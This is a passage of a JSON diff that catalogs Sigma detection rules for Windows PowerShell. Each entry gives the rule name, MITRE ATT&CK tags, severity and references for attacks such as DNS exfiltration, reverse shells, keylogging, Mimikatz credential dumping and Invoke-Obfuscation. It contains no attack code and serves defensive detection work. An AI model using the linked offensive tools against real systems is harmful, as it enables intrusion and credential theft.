Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", + "uuid": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", + "value": "Execute Invoke-command on Remote Host", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-2---invoke-command", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_command_remote.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.006" + ], + "creation_date": "2022/01/07", + "filename": "posh_ps_invoke_command_remote.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", + "uuid": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "value": "Powershell DNSExfiltration", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh", + "https://github.com/Arno0x/DNSExfiltrator", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048" + ], + "creation_date": "2022/01/07", + "filename": "posh_ps_invoke_dnsexfiltration.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Legitimate script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Commandlet name for PrintNightmare exploitation.", + "uuid": "6d3f1399-a81c-4409-aff3-1ecfe9330baf", + "value": "PrintNightmare Powershell Exploitation", + "meta": { + "refs": [ + "https://github.com/calebstewart/CVE-2021-1675", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_nightmare.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ], + "creation_date": "2021/08/09", + "filename": "posh_ps_invoke_nightmare.yml", + "author": "Max Altgelt, Tobias Michalski", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "uuid": "73e67340-0d25-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/13", + "filename": "posh_ps_invoke_obfuscation_clip.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", + "uuid": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", + "meta": { + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/11/08", + "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "uuid": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation STDIN+ Launcher - Powershell", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/15", + "filename": "posh_ps_invoke_obfuscation_stdin.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "uuid": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/15", + "filename": "posh_ps_invoke_obfuscation_var.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "uuid": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/18", + "filename": "posh_ps_invoke_obfuscation_via_compress.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "uuid": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/18", + "filename": "posh_ps_invoke_obfuscation_via_rundll.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "uuid": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", + "value": "Invoke-Obfuscation Via Stdin - Powershell", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/12", + "filename": "posh_ps_invoke_obfuscation_via_stdin.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "uuid": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", + "value": "Invoke-Obfuscation Via Use Clip - Powershell", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/09", + "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "uuid": "e55a5195-4724-480e-a77e-3ebe64bd3759", + "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/08", + "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "uuid": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/10/08", + "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "uuid": "e54f5149-6ba3-49cf-b153-070d24679126", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/13", + "filename": "posh_ps_invoke_obfuscation_via_var.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", + "uuid": "34f90d3c-c297-49e9-b26d-911b05a4866c", + "value": "Powershell Keylogging", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_keylogging.yml" + ], + "tags": [ + "attack.collection", + "attack.t1056.001" + ], + "creation_date": "2021/07/30", + "filename": "posh_ps_keylogging.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", + "uuid": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", + "value": "Powershell LocalAccount Manipulation", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_localuser.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2021/12/28", + "filename": "posh_ps_localuser.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate administrative script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "uuid": "4a241dea-235b-4a7e-8d76-50d817b146c4", + "value": "Suspicious PowerShell Mailbox Export to Share - PS", + "meta": { + "refs": [ + "https://youtu.be/5mqid-7zp8k?t=2481", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml" + ], + "tags": [ + "attack.exfiltration" + ], + "creation_date": "2022/10/26", + "filename": "posh_ps_mailboxexport_share.yml", + "author": "Nasreddine Bencherchali", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "uuid": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "value": "Malicious PowerShell Commandlets", + "meta": { + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/05", + "filename": "posh_ps_malicious_commandlets.yml", + "author": "Sean Metcalf (source), Florian Roth (rule), Bartlomiej Czyz @bczyz1 (update), oscd.community (update), Nasreddine Bencherchali (update), Tim Shelton (fp), Mustafa Kaan Demir (update), Georg Lauenstein (update)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects keywords from well-known PowerShell exploitation frameworks", + "uuid": "f62176f3-8128-4faa-bf6c-83261322e5eb", + "value": "Malicious PowerShell Keywords", + "meta": { + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/05", + "filename": "posh_ps_malicious_keywords.yml", + "author": "Sean Metcalf (source), Florian Roth (rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", + "uuid": "cd185561-4760-45d6-a63e-a51325112cae", + "value": "Live Memory Dump Using Powershell", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml" + ], + "tags": [ + "attack.t1003" + ], + "creation_date": "2021/09/21", + "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml", + "author": "Max Altgelt", + "level": "high", + "falsepositive": [ + "Diagnostics" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "uuid": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", + "value": "Modify Group Policy Settings - ScriptBlockLogging", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1484.001" + ], + "creation_date": "2022/08/19", + "filename": "posh_ps_modify_group_policy_settings.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "uuid": "78aa1347-1517-4454-9982-b338d6df8343", + "value": "Powershell MsXml COM Object", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt", + "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)", + "https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/01/19", + "filename": "posh_ps_msxml_com.yml", + "author": "frack113, MatilJ", + "level": "medium", + "falsepositive": [ + "Legitimate administrative script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", + "uuid": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", + "value": "Malicious Nishang PowerShell Commandlets", + "meta": { + "refs": [ + "https://github.com/samratashok/nishang", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/05/16", + "filename": "posh_ps_nishang_malicious_commandlets.yml", + "author": "Alec Costello", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", + "uuid": "8c521530-5169-495d-a199-0a3a881ad24e", + "value": "NTFS Alternate Data Stream", + "meta": { + "refs": [ + "http://www.powertheshell.com/ntfsstreams/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_ntfs_ads_access.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2018/07/24", + "filename": "posh_ps_ntfs_ads_access.yml", + "author": "Sami Ruohonen", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", + "uuid": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", + "value": "Code Executed Via Office Add-in XLL File", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137.006/T1137.006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137.006" + ], + "creation_date": "2021/12/28", + "filename": "posh_ps_office_comobject_registerxll.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", + "uuid": "189e3b02-82b2-4b90-9662-411eb64486d4", + "value": "Potential Invoke-Mimikatz PowerShell Script", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/potential-invoke-mimikatz-powershell-script.html#potential-invoke-mimikatz-powershell-script", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "creation_date": "2022/09/28", + "filename": "posh_ps_potential_invoke_mimikatz.yml", + "author": "Tim Rauch", + "level": "high", + "falsepositive": [ + "Mimikatz can be useful for testing the security of networks" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", + "uuid": "dcd74b95-3f36-4ed9-9598-0490951643aa", + "value": "Malicious PowerView PowerShell Commandlets", + "meta": { + "refs": [ + "https://powersploit.readthedocs.io/en/stable/Recon/README", + "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon", + "https://thedfirreport.com/2020/10/08/ryuks-return", + "https://adsecurity.org/?p=2277", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2021/05/18", + "filename": "posh_ps_powerview_malicious_commandlets.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Should not be any as administrators do not use this tool" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects PowerShell calling a credential prompt", + "uuid": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "value": "PowerShell Credential Prompt", + "meta": { + "refs": [ + "https://twitter.com/JohnLaTwC/status/850381440629981184", + "https://t.co/ezOTGy1a1G", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/04/09", + "filename": "posh_ps_prompt_credentials.yml", + "author": "John Lambert (idea), Florian Roth (rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", + "uuid": "afd3df04-948d-46f6-ae44-25966c44b97f", + "value": "PSAsyncShell - Asynchronous TCP Reverse Shell", + "meta": { + "refs": [ + "https://github.com/JoelGMSec/PSAsyncShell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/10/04", + "filename": "posh_ps_psasyncshell.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of PSAttack PowerShell hack tool", + "uuid": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", + "value": "PowerShell PSAttack", + "meta": { + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psattack.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/05", + "filename": "posh_ps_psattack.yml", + "author": "Sean Metcalf (source), Florian Roth (rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system\n", + "uuid": "a0edd39f-a0c6-4c17-8141-261f958e8d8f", + "value": "PowerShell Remote Session Creation", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remote_session_creation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/01/06", + "filename": "posh_ps_remote_session_creation.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate administrative script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Powershell Remove-Item with -Path to delete a file or a folder with \"-Recurse\"", + "uuid": "b8af5f36-1361-4ebe-9e76-e36128d947bf", + "value": "Use Remove-Item to Delete File", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remove_item_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ], + "creation_date": "2022/01/15", + "filename": "posh_ps_remove_item_path.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", + "uuid": "a861d835-af37-4930-bcd6-5b178bfb54df", + "value": "Request A Single Ticket via PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ], + "creation_date": "2021/12/28", + "filename": "posh_ps_request_kerberos_ticket.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "uuid": "42821614-9264-4761-acfc-5772c3286f76", + "value": "Root Certificate Installed - PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.004" + ], + "creation_date": "2020/10/10", + "filename": "posh_ps_root_certificate_installed.yml", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "level": "medium", + "falsepositive": [ + "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", + "uuid": "902cedee-0398-4e3a-8183-6f3a89773a96", + "value": "Suspicious Invoke-Item From Mount-DiskImage", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso", + "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.005" + ], + "creation_date": "2022/02/01", + "filename": "posh_ps_run_from_mount_diskimage.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.\nThis may include things such as firewall rules and anti-viru\n", + "uuid": "904e8e61-8edf-4350-b59c-b905fc8e810c", + "value": "Security Software Discovery by Powershell", + "meta": { + "refs": [ + 